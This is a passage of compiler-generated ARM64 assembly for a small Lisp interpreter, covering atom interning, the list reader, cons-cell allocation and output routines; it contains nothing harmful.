#-24] ; 8-byte Folded Reload adrp x8, _wrd_true@GOTPAGE ldr x8, [x8, _wrd_true@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.9@PAGE add x1, x1, l_.str.9@PAGEOFF bl _mk_atom ldur x2, [x29, #-24] ; 8-byte Folded Reload adrp x8, _wrd_false@GOTPAGE ldr x8, [x8, _wrd_false@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.10@PAGE add x1, x1, l_.str.10@PAGEOFF bl _mk_atom ldur x2, [x29, #-24] ; 8-byte Folded Reload adrp x8, _wrd_no_time_limit@GOTPAGE ldr x8, [x8, _wrd_no_time_limit@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.11@PAGE add x1, x1, l_.str.11@PAGEOFF bl _mk_atom ldur x2, [x29, #-24] ; 8-byte Folded Reload adrp x8, _wrd_out_of_time@GOTPAGE ldr x8, [x8, _wrd_out_of_time@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.12@PAGE add x1, x1, l_.str.12@PAGEOFF bl _mk_atom ldur x2, [x29, #-24] ; 8-byte Folded Reload adrp x8, _wrd_out_of_data@GOTPAGE ldr x8, [x8, _wrd_out_of_data@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.13@PAGE add x1, x1, l_.str.13@PAGEOFF bl _mk_atom ldur x2, [x29, #-24] ; 8-byte Folded Reload adrp x8, _wrd_success@GOTPAGE ldr x8, [x8, _wrd_success@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.14@PAGE add x1, x1, l_.str.14@PAGEOFF bl _mk_atom mov x8, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload adrp x9, _wrd_failure@GOTPAGE ldr x9, [x9, _wrd_failure@GOTPAGEOFF] str x8, [x9] adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF mov x2, #3 str x2, [sp, #8] ; 8-byte Folded Spill bl _mk_atom mov x8, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload adrp x9, _wrd_define@GOTPAGE ldr x9, [x9, _wrd_define@GOTPAGEOFF] str x8, [x9] adrp x1, l_.str.15@PAGE add x1, x1, l_.str.15@PAGEOFF mov x2, #4 str x2, [sp, #32] ; 8-byte Folded Spill bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload mov x8, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload adrp x9, _wrd_let@GOTPAGE ldr x9, [x9, _wrd_let@GOTPAGEOFF] str x8, [x9] adrp x1, l_.str.16@PAGE add x1, x1, l_.str.16@PAGEOFF bl _mk_atom mov x8, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload adrp x9, _wrd_lambda@GOTPAGE ldr x9, [x9, _wrd_lambda@GOTPAGEOFF] str x8, [x9] adrp x1, l_.str.17@PAGE add x1, x1, l_.str.17@PAGEOFF mov x2, #2 str x2, [sp, #24] ; 8-byte Folded Spill bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload mov x8, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload adrp x9, _wrd_cadr@GOTPAGE ldr x9, [x9, _wrd_cadr@GOTPAGEOFF] str x8, [x9] adrp x1, l_.str.18@PAGE add x1, x1, l_.str.18@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload mov x8, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload adrp x9, _wrd_caddr@GOTPAGE ldr x9, [x9, _wrd_caddr@GOTPAGEOFF] str x8, [x9] adrp x1, l_.str.19@PAGE add x1, x1, l_.str.19@PAGEOFF bl _mk_atom ldr x2, [sp, #32] ; 8-byte Folded Reload mov x8, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload adrp x9, _wrd_quote@GOTPAGE ldr x9, [x9, _wrd_quote@GOTPAGEOFF] str x8, [x9] adrp x1, l_.str.20@PAGE add x1, x1, l_.str.20@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload adrp x8, _wrd_if@GOTPAGE ldr x8, [x8, _wrd_if@GOTPAGEOFF] str x0, [x8] mov x0, #1 str x0, [sp, #16] ; 8-byte Folded Spill adrp x1, l_.str.21@PAGE add x1, x1, l_.str.21@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload adrp x8, _wrd_car@GOTPAGE ldr x8, [x8, _wrd_car@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.22@PAGE add x1, x1, l_.str.22@PAGEOFF bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload adrp x8, _wrd_cdr@GOTPAGE ldr x8, [x8, _wrd_cdr@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.23@PAGE add x1, x1, l_.str.23@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload mov x8, x0 ldr x0, [sp, #32] ; 8-byte Folded Reload stur x8, [x29, #-8] adrp x1, l_.str.24@PAGE add x1, x1, l_.str.24@PAGEOFF bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #5 adrp x1, l_.str.25@PAGE add x1, x1, l_.str.25@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #6 adrp x1, l_.str.26@PAGE add x1, x1, l_.str.26@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #7 adrp x1, l_.str.27@PAGE add x1, x1, l_.str.27@PAGEOFF bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #8 adrp x1, l_.str.28@PAGE add x1, x1, l_.str.28@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #9 adrp x1, l_.str.29@PAGE add x1, x1, l_.str.29@PAGEOFF bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #10 adrp x1, l_.str.30@PAGE add x1, x1, l_.str.30@PAGEOFF bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #11 adrp x1, l_.str.31@PAGE add x1, x1, l_.str.31@PAGEOFF bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #12 adrp x1, l_.str.32@PAGE add x1, x1, l_.str.32@PAGEOFF bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #13 adrp x1, l_.str.33@PAGE add x1, x1, l_.str.33@PAGEOFF bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #14 adrp x1, l_.str.34@PAGE add x1, x1, l_.str.34@PAGEOFF bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #15 adrp x1, l_.str.35@PAGE add x1, x1, l_.str.35@PAGEOFF bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #16 adrp x1, l_.str.36@PAGE add x1, x1, l_.str.36@PAGEOFF bl _mk_atom ldr x2, [sp, #8] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #17 adrp x1, l_.str.37@PAGE add x1, x1, l_.str.37@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #18 adrp x1, l_.str.38@PAGE add x1, x1, l_.str.38@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #19 adrp x1, l_.str.39@PAGE add x1, x1, l_.str.39@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #20 adrp x1, l_.str.40@PAGE add x1, x1, l_.str.40@PAGEOFF bl _mk_atom ldr x2, [sp, #16] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #21 adrp x1, l_.str.41@PAGE add x1, x1, l_.str.41@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #22 adrp x1, l_.str.42@PAGE add x1, x1, l_.str.42@PAGEOFF bl _mk_atom ldr x2, [sp, #16] ; 8-byte Folded Reload stur x0, [x29, #-8] mov x0, #23 adrp x1, l_.str.43@PAGE add x1, x1, l_.str.43@PAGEOFF bl _mk_atom ldr x2, [sp, #24] ; 8-byte Folded Reload mov x8, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload stur x8, [x29, #-8] adrp x1, l_.str.44@PAGE add x1, x1, l_.str.44@PAGEOFF bl _mk_atom ldr x2, [sp, #32] ; 8-byte Folded Reload mov x8, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload adrp x9, _wrd_eval@GOTPAGE ldr x9, [x9, _wrd_eval@GOTPAGEOFF] str x8, [x9] adrp x1, l_.str.45@PAGE add x1, x1, l_.str.45@PAGEOFF bl _mk_atom ldur x2, [x29, #-24] ; 8-byte Folded Reload adrp x8, _wrd_try@GOTPAGE ldr x8, [x8, _wrd_try@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.46@PAGE add x1, x1, l_.str.46@PAGEOFF bl _mk_atom ldur x2, [x29, #-24] ; 8-byte Folded Reload adrp x8, _left_bracket@GOTPAGE ldr x8, [x8, _left_bracket@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.47@PAGE add x1, x1, l_.str.47@PAGEOFF bl _mk_atom ldur x2, [x29, #-24] ; 8-byte Folded Reload adrp x8, _right_bracket@GOTPAGE ldr x8, [x8, _right_bracket@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.48@PAGE add x1, x1, l_.str.48@PAGEOFF bl _mk_atom ldur x2, [x29, #-24] ; 8-byte Folded Reload adrp x8, _left_paren@GOTPAGE ldr x8, [x8, _left_paren@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.49@PAGE add x1, x1, l_.str.49@PAGEOFF bl _mk_atom ldur x2, [x29, #-24] ; 8-byte Folded Reload adrp x8, _right_paren@GOTPAGE ldr x8, [x8, _right_paren@GOTPAGEOFF] str x0, [x8] mov x0, x2 adrp x1, l_.str.50@PAGE add x1, x1, l_.str.50@PAGEOFF bl _mk_atom mov x8, x0 ldur x0, [x29, #-24] ; 8-byte Folded Reload adrp x9, _double_quote@GOTPAGE ldr x9, [x9, _double_quote@GOTPAGEOFF] str x8, [x9] bl _mk_numb ldur x1, [x29, #-24] ; 8-byte Folded Reload adrp x8, _wrd_zero@GOTPAGE ldr x8, [x8, _wrd_zero@GOTPAGEOFF] str x0, [x8] mov x0, #49 bl _cons bl _mk_numb adrp x8, _wrd_one@GOTPAGE ldr x8, [x8, _wrd_one@GOTPAGEOFF] str x0, [x8] ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _in ; -- Begin function in .p2align 2 _in: ; @in .cfi_startproc ; %bb.0: sub sp, sp, #304 .cfi_def_cfa_offset 304 stp x28, x27, [sp, #272] ; 16-byte Folded Spill stp x29, x30, [sp, #288] ; 16-byte Folded Spill add x29, sp, #288 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] stur x8, [x29, #-128] ; 8-byte Folded Spill adrp x8, _wrd_cdr@GOTPAGE ldr x8, [x8, _wrd_cdr@GOTPAGEOFF] stur x8, [x29, #-120] ; 8-byte Folded Spill stur x0, [x29, #-32] stur x1, [x29, #-40] bl _in_word stur x0, [x29, #-48] ldur x8, [x29, #-48] adrp x9, _right_paren@GOTPAGE ldr x9, [x9, _right_paren@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB2_4 b LBB2_1 LBB2_1: ldur x8, [x29, #-40] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB2_3 b LBB2_2 LBB2_2: ldur x8, [x29, #-48] stur x8, [x29, #-24] b LBB2_27 LBB2_3: stur xzr, [x29, #-24] b LBB2_27 LBB2_4: ldur x8, [x29, #-48] adrp x9, _left_paren@GOTPAGE ldr x9, [x9, _left_paren@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB2_9 b LBB2_5 LBB2_5: mov x1, #0 mov x0, x1 bl _cons stur x0, [x29, #-64] stur x0, [x29, #-56] b LBB2_6 LBB2_6: ; =>This Inner Loop Header: Depth=1 ldur x0, [x29, #-32] mov x1, #1 bl _in stur x0, [x29, #-72] adrp x8, _right_paren@GOTPAGE ldr x8, [x8, _right_paren@GOTPAGEOFF] ldr x8, [x8] subs x8, x0, x8 cset w8, eq tbnz w8, #0, LBB2_8 b LBB2_7 LBB2_7: ; in Loop: Header=BB2_6 Depth=1 ldur x0, [x29, #-72] mov x1, #0 bl _cons ldur x8, [x29, #-128] ; 8-byte Folded Reload ldur x9, [x29, #-64] str x0, [x8, x9, lsl #3] stur x0, [x29, #-64] b LBB2_6 LBB2_8: ldur x8, [x29, #-128] ; 8-byte Folded Reload ldur x9, [x29, #-56] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-24] b LBB2_27 LBB2_9: ldur x8, [x29, #-32] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB2_11 b LBB2_10 LBB2_10: ldur x8, [x29, #-48] stur x8, [x29, #-24] b LBB2_27 LBB2_11: ldur x8, [x29, #-48] adrp x9, _double_quote@GOTPAGE ldr x9, [x9, _double_quote@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB2_13 b LBB2_12 LBB2_12: mov x1, #0 mov x0, x1 bl _in stur x0, [x29, #-24] b LBB2_27 LBB2_13: ldur x8, [x29, #-48] adrp x9, _wrd_cadr@GOTPAGE ldr x9, [x9, _wrd_cadr@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB2_15 b LBB2_14 LBB2_14: ldur x8, [x29, #-120] ; 8-byte Folded Reload adrp x9, _wrd_car@GOTPAGE ldr x9, [x9, _wrd_car@GOTPAGEOFF] ldr x9, [x9] stur x9, [x29, #-136] ; 8-byte Folded Spill ldr x8, [x8] str x8, [sp, #136] ; 8-byte Folded Spill mov x0, #1 mov x1, #0 str x1, [sp, #144] ; 8-byte Folded Spill bl _in ldr x1, [sp, #144] ; 8-byte Folded Reload bl _cons mov x1, x0 ldr x0, [sp, #136] ; 8-byte Folded Reload bl _cons ldr x1, [sp, #144] ; 8-byte Folded Reload bl _cons mov x1, x0 ldur x0, [x29, #-136] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-24] b LBB2_27 LBB2_15: ldur x8, [x29, #-48] adrp x9, _wrd_caddr@GOTPAGE ldr x9, [x9, _wrd_caddr@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB2_17 b LBB2_16 LBB2_16: ldur x8, [x29, #-120] ; 8-byte Folded Reload adrp x9, _wrd_car@GOTPAGE ldr x9, [x9, _wrd_car@GOTPAGEOFF] ldr x9, [x9] str x9, [sp, #128] ; 8-byte Folded Spill ldr x9, [x8] str x9, [sp, #112] ; 8-byte Folded Spill ldr x8, [x8] str x8, [sp, #104] ; 8-byte Folded Spill mov x0, #1 mov x1, #0 str x1, [sp, #120] ; 8-byte Folded Spill bl _in ldr x1, [sp, #120] ; 8-byte Folded Reload bl _cons mov x1, x0 ldr x0, [sp, #104] ; 8-byte Folded Reload bl _cons ldr x1, [sp, #120] ; 8-byte Folded Reload bl _cons mov x1, x0 ldr x0, [sp, #112] ; 8-byte Folded Reload bl _cons ldr x1, [sp, #120] ; 8-byte Folded Reload bl _cons mov x1, x0 ldr x0, [sp, #128] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-24] b LBB2_27 LBB2_17: ldur x8, [x29, #-48] adrp x9, _wrd_let@GOTPAGE ldr x9, [x9, _wrd_let@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB2_21 b LBB2_18 LBB2_18: mov x0, #1 str x0, [sp, #96] ; 8-byte Folded Spill mov x1, #0 str x1, [sp, #88] ; 8-byte Folded Spill bl _in ldr x1, [sp, #88] ; 8-byte Folded Reload mov x8, x0 ldr x0, [sp, #96] ; 8-byte Folded Reload stur x8, [x29, #-80] bl _in ldr x1, [sp, #88] ; 8-byte Folded Reload mov x8, x0 ldr x0, [sp, #96] ; 8-byte Folded Reload stur x8, [x29, #-88] bl _in stur x0, [x29, #-96] ldur x9, [x29, #-80] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB2_20 b LBB2_19 LBB2_19: ldur x8, [x29, #-128] ; 8-byte Folded Reload ldur x9, [x29, #-80] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-104] ldur x9, [x29, #-80] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-80] adrp x8, _wrd_quote@GOTPAGE ldr x8, [x8, _wrd_quote@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #80] ; 8-byte Folded Spill adrp x8, _wrd_lambda@GOTPAGE ldr x8, [x8, _wrd_lambda@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #64] ; 8-byte Folded Spill ldur x8, [x29, #-104] str x8, [sp, #56] ; 8-byte Folded Spill ldur x0, [x29, #-88] mov x1, #0 str x1, [sp, #72] ; 8-byte Folded Spill bl _cons mov x1, x0 ldr x0, [sp, #56] ; 8-byte Folded Reload bl _cons mov x1, x0 ldr x0, [sp, #64] ; 8-byte Folded Reload bl _cons ldr x1, [sp, #72] ; 8-byte Folded Reload bl _cons mov x1, x0 ldr x0, [sp, #80] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-88] b LBB2_20 LBB2_20: adrp x8, _wrd_quote@GOTPAGE ldr x8, [x8, _wrd_quote@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #32] ; 8-byte Folded Spill adrp x8, _wrd_lambda@GOTPAGE ldr x8, [x8, _wrd_lambda@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #24] ; 8-byte Folded Spill ldur x0, [x29, #-80] mov x1, #0 str x1, [sp, #40] ; 8-byte Folded Spill bl _cons ldr x1, [sp, #40] ; 8-byte Folded Reload str x0, [sp, #16] ; 8-byte Folded Spill ldur x0, [x29, #-96] bl _cons mov x1, x0 ldr x0, [sp, #16] ; 8-byte Folded Reload bl _cons mov x1, x0 ldr x0, [sp, #24] ; 8-byte Folded Reload bl _cons ldr x1, [sp, #40] ; 8-byte Folded Reload bl _cons mov x1, x0 ldr x0, [sp, #32] ; 8-byte Folded Reload bl _cons ldr x1, [sp, #40] ; 8-byte Folded Reload str x0, [sp, #48] ; 8-byte Folded Spill ldur x0, [x29, #-88] bl _cons mov x1, x0 ldr x0, [sp, #48] ; 8-byte Folded Reload bl _cons stur x0, [x29, #-24] b LBB2_27 LBB2_21: ldur x9, [x29, #-48] adrp x8, _pf_args@GOTPAGE ldr x8, [x8, _pf_args@GOTPAGEOFF] ldrsh x8, [x8, x9, lsl #1] stur x8, [x29, #-112] ldur x8, [x29, #-112] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB2_23 b LBB2_22 LBB2_22: ldur x8, [x29, #-48] stur x8, [x29, #-24] b LBB2_27 LBB2_23: ldur x0, [x29, #-48] mov x1, #0 bl _cons stur x0, [x29, #-64] stur x0, [x29, #-56] b LBB2_24 LBB2_24: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-112] subs x8, x8, #1 stur x8, [x29, #-112] subs x8, x8, #0 cset w8, le tbnz w8, #0, LBB2_26 b LBB2_25 LBB2_25: ; in Loop: Header=BB2_24 Depth=1 mov x0, #1 mov x1, #0 str x1, [sp, #8] ; 8-byte Folded Spill bl _in ldr x1, [sp, #8] ; 8-byte Folded Reload bl _cons ldur x8, [x29, #-128] ; 8-byte Folded Reload ldur x9, [x29, #-64] str x0, [x8, x9, lsl #3] stur x0, [x29, #-64] b LBB2_24 LBB2_26: ldur x8, [x29, #-56] stur x8, [x29, #-24] b LBB2_27 LBB2_27: ldur x0, [x29, #-24] ldp x29, x30, [sp, #288] ; 16-byte Folded Reload ldp x28, x27, [sp, #272] ; 16-byte Folded Reload add sp, sp, #304 ret .cfi_endproc ; -- End function .globl _cons ; -- Begin function cons .p2align 2 _cons: ; @cons .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] str x1, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB3_3 b LBB3_1 LBB3_1: ldr x9, [sp, #8] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_3 b LBB3_2 LBB3_2: ldr x8, [sp, #16] stur x8, [x29, #-8] b LBB3_6 LBB3_3: adrp x8, _next@PAGE ldr x8, [x8, _next@PAGEOFF] mov x9, #16960 movk x9, #15, lsl #16 subs x8, x8, x9 cset w8, lt tbnz w8, #0, LBB3_5 b LBB3_4 LBB3_4: adrp x0, l_.str.51@PAGE add x0, x0, l_.str.51@PAGEOFF bl _printf mov w0, #0 bl _exit LBB3_5: adrp x10, _next@PAGE ldr x8, [x10, _next@PAGEOFF] add x9, x8, #1 str x9, [x10, _next@PAGEOFF] str x8, [sp] ldr x8, [sp, #16] ldr x10, [sp] adrp x9, _car@GOTPAGE ldr x9, [x9, _car@GOTPAGEOFF] str x8, [x9, x10, lsl #3] ldr x8, [sp, #8] ldr x10, [sp] adrp x9, _cdr@GOTPAGE ldr x9, [x9, _cdr@GOTPAGEOFF] str x8, [x9, x10, lsl #3] ldr x9, [sp] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] add x8, x8, x9, lsl #1 strh wzr, [x8] ldr x9, [sp] adrp x8, _numb@GOTPAGE ldr x8, [x8, _numb@GOTPAGEOFF] add x8, x8, x9, lsl #1 strh wzr, [x8] ldr x10, [sp] adrp x9, _pname@GOTPAGE ldr x9, [x9, _pname@GOTPAGEOFF] mov x8, #0 str x8, [x9, x10, lsl #3] ldr x10, [sp] adrp x9, _pf_numb@GOTPAGE ldr x9, [x9, _pf_numb@GOTPAGEOFF] add x9, x9, x10, lsl #1 strh wzr, [x9] ldr x10, [sp] adrp x9, _pf_args@GOTPAGE ldr x9, [x9, _pf_args@GOTPAGEOFF] add x9, x9, x10, lsl #1 strh wzr, [x9] ldr x10, [sp] adrp x9, _vlst@GOTPAGE ldr x9, [x9, _vlst@GOTPAGEOFF] str x8, [x9, x10, lsl #3] ldr x8, [sp] stur x8, [x29, #-8] b LBB3_6 LBB3_6: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _out ; -- Begin function out .p2align 2 _out: ; @out .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] ldur x8, [x29, #-8] mov x9, sp str x8, [x9] adrp x0, l_.str.52@PAGE add x0, x0, l_.str.52@PAGEOFF bl _printf adrp x8, _col@PAGE str xzr, [x8, _col@PAGEOFF] ldr x0, [sp, #16] bl _out_lst adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldr x0, [sp, #16] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _ev ; -- Begin function ev .p2align 2 _ev: ; @ev .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] mov x1, #0 str x1, [sp, #8] ; 8-byte Folded Spill mov x0, x1 bl _cons ldr x1, [sp, #8] ; 8-byte Folded Reload adrp x8, _turing_machine_tapes@GOTPAGE ldr x8, [x8, _turing_machine_tapes@GOTPAGEOFF] str x0, [x8] mov x0, #1 bl _cons ldr x1, [sp, #8] ; 8-byte Folded Reload adrp x8, _display_enabled@GOTPAGE ldr x8, [x8, _display_enabled@GOTPAGEOFF] str x0, [x8] mov x0, x1 bl _cons adrp x8, _captured_displays@GOTPAGE ldr x8, [x8, _captured_displays@GOTPAGEOFF] str x0, [x8] ldur x0, [x29, #-8] adrp x8, _wrd_no_time_limit@GOTPAGE ldr x8, [x8, _wrd_no_time_limit@GOTPAGEOFF] ldr x1, [x8] bl _eval str x0, [sp, #16] ldr x8, [sp, #16] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB5_2 b LBB5_1 LBB5_1: ldr x9, [sp, #16] mov x8, #0 subs x8, x8, x9 str x8, [sp] ; 8-byte Folded Spill b LBB5_3 LBB5_2: ldr x8, [sp, #16] str x8, [sp] ; 8-byte Folded Spill b LBB5_3 LBB5_3: ldr x0, [sp] ; 8-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _mk_atom ; -- Begin function mk_atom .p2align 2 _mk_atom: ; @mk_atom .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] str x2, [sp, #24] mov x1, #0 str x1, [sp] ; 8-byte Folded Spill mov x0, x1 bl _cons str x0, [sp, #16] ldr x8, [sp, #16] ldr x10, [sp, #16] adrp x9, _cdr@GOTPAGE ldr x9, [x9, _cdr@GOTPAGEOFF] str x8, [x9, x10, lsl #3] ldr x10, [sp, #16] adrp x9, _car@GOTPAGE ldr x9, [x9, _car@GOTPAGEOFF] str x8, [x9, x10, lsl #3] ldr x9, [sp, #16] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] add x9, x8, x9, lsl #1 mov w8, #1 strh w8, [x9] ldr x9, [sp, #16] adrp x8, _numb@GOTPAGE ldr x8, [x8, _numb@GOTPAGEOFF] add x8, x8, x9, lsl #1 strh wzr, [x8] ldur x0, [x29, #-16] bl _mk_string ldr x1, [sp] ; 8-byte Folded Reload ldr x9, [sp, #16] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] str x0, [x8, x9, lsl #3] ldur x8, [x29, #-8] ldr x10, [sp, #16] adrp x9, _pf_numb@GOTPAGE ldr x9, [x9, _pf_numb@GOTPAGEOFF] ; kill: def $w8 killed $w8 killed $x8 strh w8, [x9, x10, lsl #1] ldr x8, [sp, #24] ldr x10, [sp, #16] adrp x9, _pf_args@GOTPAGE ldr x9, [x9, _pf_args@GOTPAGEOFF] ; kill: def $w8 killed $w8 killed $x8 strh w8, [x9, x10, lsl #1] ldr x0, [sp, #16] bl _cons ldr x9, [sp, #16] adrp x8, _vlst@GOTPAGE ldr x8, [x8, _vlst@GOTPAGEOFF] str x0, [x8, x9, lsl #3] ldr x0, [sp, #16] adrp x8, _obj_lst@GOTPAGE ldr x8, [x8, _obj_lst@GOTPAGEOFF] str x8, [sp, #8] ; 8-byte Folded Spill ldr x1, [x8] bl _cons ldr x8, [sp, #8] ; 8-byte Folded Reload str x0, [x8] ldr x0, [sp, #16] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _mk_numb ; -- Begin function mk_numb .p2align 2 _mk_numb: ; @mk_numb .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] mov x1, #0 str x1, [sp, #8] ; 8-byte Folded Spill mov x0, x1 bl _cons ldr x8, [sp, #8] ; 8-byte Folded Reload str x0, [sp, #16] ldr x9, [sp, #16] ldr x11, [sp, #16] adrp x10, _cdr@GOTPAGE ldr x10, [x10, _cdr@GOTPAGEOFF] str x9, [x10, x11, lsl #3] ldr x11, [sp, #16] adrp x10, _car@GOTPAGE ldr x10, [x10, _car@GOTPAGEOFF] str x9, [x10, x11, lsl #3] ldr x10, [sp, #16] adrp x9, _atom@GOTPAGE ldr x9, [x9, _atom@GOTPAGEOFF] add x10, x9, x10, lsl #1 mov w9, #1 strh w9, [x10] ldr x11, [sp, #16] adrp x10, _numb@GOTPAGE ldr x10, [x10, _numb@GOTPAGEOFF] add x10, x10, x11, lsl #1 strh w9, [x10] ldur x9, [x29, #-8] ldr x11, [sp, #16] adrp 